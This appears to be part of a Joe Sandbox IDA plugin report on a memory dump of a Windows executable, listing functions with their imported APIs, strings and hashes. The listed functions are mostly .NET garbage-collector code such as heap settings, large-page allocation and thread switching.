HeapVerify, xrefs: 00007FF7F30D5AEF
BGCMemGoal, xrefs: 00007FF7F30D5D15
GCHeapHardLimit, xrefs: 00007FF7F30D5C7D
GCLOHThreshold, xrefs: 00007FF7F30D5B19
BGCFLSweepGoal, xrefs: 00007FF7F30D5D3F
GCHeapAffinitizeMask, xrefs: 00007FF7F30D5BF5
GCRetainVM, xrefs: 00007FF7F30D5A08
BGCFLEnableSmooth, xrefs: 00007FF7F30D5E3B
BGCMemGoalSlack, xrefs: 00007FF7F30D5D2A
GCBreakOnOOM, xrefs: 00007FF7F30D5A23
GCNoAffinitize, xrefs: 00007FF7F30D5A43
GCHeapHardLimitSOHPercent, xrefs: 00007FF7F30D5EE2
GCHeapHardLimitSOH, xrefs: 00007FF7F30D5E94
System.GC.HeapHardLimitPOHPercent, xrefs: 00007FF7F30D5F0F
BGCMLkp, xrefs: 00007FF7F30D5DE7

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
API String ID: 0-2894337444
Opcode ID: 74f12abebdec37d7c1a924af04a51bf3d00766e55ccea131ab3310974e725ded
Instruction ID: ad1cedfd2f5b323ca76a55b93979a73334c086cf20db48648f83029e99c9844a
Opcode Fuzzy Hash: 74f12abebdec37d7c1a924af04a51bf3d00766e55ccea131ab3310974e725ded
Instruction Fuzzy Hash: E6F1959591855BA2F7C0FB54E8410F5AB66BF94340BC4407BE82D6A1F6DEACA249C3F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30D4B00 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7F30D4B3C
GetCurrentProcess.KERNEL32 ref: 00007FF7F30D4B64
OpenProcessToken.ADVAPI32 ref: 00007FF7F30D4B77
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7F30D4B9C
GetLastError.KERNEL32 ref: 00007FF7F30D4BA4
CloseHandle.KERNEL32 ref: 00007FF7F30D4BB1
GetLargePageMinimum.KERNEL32 ref: 00007FF7F30D4BC6
VirtualAlloc.KERNEL32 ref: 00007FF7F30D4BF7
GetCurrentProcess.KERNEL32 ref: 00007FF7F30D4C03
VirtualAllocExNuma.KERNEL32 ref: 00007FF7F30D4C23

Strings

SeLockMemoryPrivilege, xrefs: 00007FF7F30D4B35

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
String ID: SeLockMemoryPrivilege
API String ID: 1752251271-475654710
Opcode ID: 61d71791c1eda4276b3a464382d2158deee46f94b8299937d3729a612eb898ff
Instruction ID: 28c8b7f11e6087500af72a804ca4c52ec77b23f3adb453dfaf0dd2546fccfa9a
Opcode Fuzzy Hash: 61d71791c1eda4276b3a464382d2158deee46f94b8299937d3729a612eb898ff
Instruction Fuzzy Hash: 7031A935A0C64286F7A0AB61F48437AE7A1FF44B94F844036DA5DAB7D4DF3DD4488790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30CA020 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF7F31C9AF0,00007FF7F31ECD51), ref: 00007FF7F30CA08C
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF7F31C9AF0,00007FF7F31ECD51), ref: 00007FF7F30CA1C8
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF7F31C9AF0,00007FF7F31ECD51), ref: 00007FF7F30CA2A6
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF7F31C9AF0,00007FF7F31ECD51), ref: 00007FF7F30CA2BC
RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF7F31C9AF0,00007FF7F31ECD51), ref: 00007FF7F30CA2FA

Strings

[ KeepUnwinding ], xrefs: 00007FF7F30CA2D0

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: [ KeepUnwinding ]
API String ID: 2546344036-400895726
Opcode ID: 92f8e0f5b20c6d3bf95bf9652954fb05ed00692a2bc346aa3c860580e567c973
Instruction ID: deafaaafc18669d8a192784548abf3fc1d1d35a897d726d54974a0f6684baea2
Opcode Fuzzy Hash: 92f8e0f5b20c6d3bf95bf9652954fb05ed00692a2bc346aa3c860580e567c973
Instruction Fuzzy Hash: FCA15032609A4285EBD5EF25E4502A973A2FB44B98F984137CE6D1F3D8DF39D491C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30F00D0 Relevance: 7.8, APIs: 5, Instructions: 335COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF7F30F02CB
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF7F30F030D
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF7F30F0338
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF7F30F0359
FlushProcessWriteBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF7F30F05C7

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeave$BuffersFlushProcessWrite
String ID:
API String ID: 2950773196-0
Opcode ID: deca3c29e42f071f0d3cda0ee826fb4c3c0220c245322ab3037841cbedaaa872
Instruction ID: 34b4b9d898edd8ced2e785ae7bae1706748f3fffd048476cd786a5e5c82d69b2
Opcode Fuzzy Hash: deca3c29e42f071f0d3cda0ee826fb4c3c0220c245322ab3037841cbedaaa872
Instruction Fuzzy Hash: A7E17361B0868682EBA0EB25E880375A395FF45B90F84453AD97C6F7D5DF3CE484C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30E1142 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 519COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF7F30E117C

Part of subcall function 00007FF7F30D48F0: QueryPerformanceCounter.KERNEL32 ref: 00007FF7F30D48F9

DebugBreak.KERNEL32 ref: 00007FF7F30E195E

Strings

GCHeap::Promote: Promote GC Root *%p = %p MT = %pT, xrefs: 00007FF7F30E1317

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: BreakDebug$CounterPerformanceQuery
String ID: GCHeap::Promote: Promote GC Root *%p = %p MT = %pT
API String ID: 3366438525-1582306835
Opcode ID: c04b66d63a64577f2266ef7e2dc9c24d30b6f48418d84efd86171744f8ee5cd9
Instruction ID: 31cdd941c3319059a439d87fd537142182e254d1efb74ea1039ae019f0d3f8ac
Opcode Fuzzy Hash: c04b66d63a64577f2266ef7e2dc9c24d30b6f48418d84efd86171744f8ee5cd9
Instruction Fuzzy Hash: 6332A321B08B4A82EB95EB25E450275E3A2BF44754F94433AD97E7B7D0DF3CE48483A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30CE180 Relevance: 4.6, APIs: 3, Instructions: 66timeCOMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,00007FF7F30C56FA), ref: 00007FF7F30CE24A
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,00007FF7F30C56FA), ref: 00007FF7F30CE262
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00007FF7F30C56FA), ref: 00007FF7F30CE271

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: PerformanceQueryTime$CounterFileFrequencySystem
String ID:
API String ID: 487580316-0
Opcode ID: e3c80014bd4600b9e5b9747abe55584a25cbe8e036cf22552928e23841cd6fb2
Instruction ID: 141dcb9018a097db45ac76e703a5e5715f90b836f9f77ec4cbc7e585a76d25cd
Opcode Fuzzy Hash: e3c80014bd4600b9e5b9747abe55584a25cbe8e036cf22552928e23841cd6fb2
Instruction Fuzzy Hash: 01311C31A08B4587E790EB14F840169B7B0FF88744F900639EAAC6B7A5DF3CE590CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30E22E0 Relevance: 3.3, APIs: 2, Instructions: 343threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,-3333333333333333,?,?,00000001,00007FF7F30E2C20), ref: 00007FF7F30E24A6
SwitchToThread.KERNEL32(?,-3333333333333333,?,?,00000001,00007FF7F30E2C20), ref: 00007FF7F30E24D5

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 30ca733e380dffc8b146829aa6823297a556cfef8d8b20722e8686aee0c23432
Instruction ID: 6a43563e19b8b6d61fa23904f6ac184c81e09edc7a683c93bc820c03c8af79a0
Opcode Fuzzy Hash: 30ca733e380dffc8b146829aa6823297a556cfef8d8b20722e8686aee0c23432
Instruction Fuzzy Hash: 84E1B122B0968682EB94FB11E140779F3AAFB44790F844336DA7D6B6C4DF78E4808761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30F4D80 Relevance: 2.2, APIs: 1, Instructions: 713COMMON

Download Yara Rule

APIs

ResetWriteWatch.KERNEL32 ref: 00007FF7F30F5312

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID: ResetWatchWrite
String ID:
API String ID: 473789334-0
Opcode ID: 1e33fe3cabe629b99d365f3ceb87c8f2b6215a33c0a18120e5563974912f009d
Instruction ID: c25c9830788f1f7aaec5dcaf663a5e19c138a5bd5ce0269c1806f31fdc503efa
Opcode Fuzzy Hash: 1e33fe3cabe629b99d365f3ceb87c8f2b6215a33c0a18120e5563974912f009d
Instruction Fuzzy Hash: D562B721A18A4686EB81FB35E490275E356FF08784F95423AD83DBB7D0DE3DE485C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30DFBD0 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

?, xrefs: 00007FF7F30DFC28

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: ac1c5cc8f6eaa5b1afee983a7b8ee5d8e9ef8fe3678a69c315f017e81ec90066
Instruction ID: 58eb6ffce6990de61b5977058af86e2d08d06baf15ad903fc253e41ba8ace18b
Opcode Fuzzy Hash: ac1c5cc8f6eaa5b1afee983a7b8ee5d8e9ef8fe3678a69c315f017e81ec90066
Instruction Fuzzy Hash: DE12B536A08A4682EB90EB15E440369F3A1FF45B94F944236DA7D2B7D4DF3CE485C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30F5910 Relevance: .6, Instructions: 630COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d68e5f70dd9b3a6b3c9bac9b862621dfea61e67155cfaf0a24f8022755f3e107
Instruction ID: 3f8632542f4ea2fd23a6e2be6345e74e7d0fd926c2a4c689b67bd1eeff59eee1
Opcode Fuzzy Hash: d68e5f70dd9b3a6b3c9bac9b862621dfea61e67155cfaf0a24f8022755f3e107
Instruction Fuzzy Hash: C752A53260CB8586EBA0EB25E48026AF7A5FB84794F940136EABD6B7D4DF7CD440C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30F6390 Relevance: .6, Instructions: 610COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120112704.00007FF7F33E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f30c0000_KxgGGaiW3E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a76f598848500b9eac8020d001060e5bac49b8cb8ea59c5d803b9d82a93ae1a
Instruction ID: 105f3379d2649bdb9109097d4e147d787acf5aab28d65a804414e79a35040b33
Opcode Fuzzy Hash: 4a76f598848500b9eac8020d001060e5bac49b8cb8ea59c5d803b9d82a93ae1a
Instruction Fuzzy Hash: 3842F872A1878982DBA0DB25E480269E7A5FB44BD0F544236EEBD6B7D4CF7CD480CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F30E1A00 Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119700043.00007FF7F30C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F30C0000, based on PE: true

Associated: 00000000.00000002.2119675663.00007FF7F30C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119866541.00007FF7F3283000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119960535.00007FF7F33B3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119991490.00007FF7F33CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120013125.00007FF7F33CC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120030581.00007FF7F33CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120050110.00007FF7F33D1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120069434.00007FF7F33D2000.00000004.00000001.01000000.00000003.sdmpDownload File
